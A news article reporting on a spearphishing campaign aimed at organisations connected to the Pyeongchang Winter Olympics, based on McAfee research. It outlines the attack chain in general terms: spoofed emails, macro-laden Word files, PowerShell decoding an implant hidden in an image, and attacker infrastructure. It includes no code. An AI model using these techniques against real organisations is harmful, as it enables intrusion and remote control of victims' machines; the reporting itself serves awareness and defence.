The opening ceremony for the Pyeongchang Winter Olympics in South Korea is still a month away, but cyber-criminals have already started using it as part of their social engineering plans in several phishing attacks aimed at groups involved with the games.
The attack centres around emails containing malicious Word documents, but a McAfee Advanced Threat Research report shows how much thought the threat actors are putting into the attack that, if successful, will give the attacker the ability to execute commands on the victim's computer. This includes the ability to install additional malware.
The first incident took place on 22 December with the last known coming in on 28 December. The initial email was addressed to icehockey@pyeongchang2018[.]com with several other organisations that are playing some type of support or infrastructure role in the Olympics being blind cc'd. The email was sent from an IP address in Singapore and it was spoofed to say it came from the South Korean National Counter-Terrorism Center, which at the time was running counter-terrorism drills for the Olympics.
"From a hacker's perspective, the Olympics are a perfect target. With so many people and so much technology assembled so quickly and working under onerous deadlines, the likelihood for security lapses is high,” said Mark Orlando, CTO of Cyber Services for Raytheon.
Orlando added that the attack itself is a textbook spearphishing campaign. “The hackers are targeting the people on the periphery of the games, pelting them with exactly the kinds of emails they're likely to open and hoping to get access to bigger organisations and more valuable data,” he said.
“The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant,” a spokesperson for McAfee said.
When the recipient makes the mistake to enable the macro a PowerShell script is launched. The script then downloads and reads an image file and “carves out a hidden PowerShell implant script embedded within the image file to execute.” The steganography tool embeds the script into the images pixels which hides the malicious code.
Once completed the attacker will have an encrypted channel from the victim to the attacker's server most likely giving them the ability to execute code and install additional malware.The McAfee research found an IP address in an Apache server log connected to a URL located in South Korea along with another that links to a server in Costa Rica that resolves to mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered via Freenom, a free anonymous domain provider. It appears the attacker is using parts of a domain that belong to the South Korean Ministry of Agriculture and Forestry, which is in line with the attached document name in the email, but this domain has nothing to do with this government agency.
It is expected that with the upcoming Olympics the number of Olympics-related cyber-attacks will rise.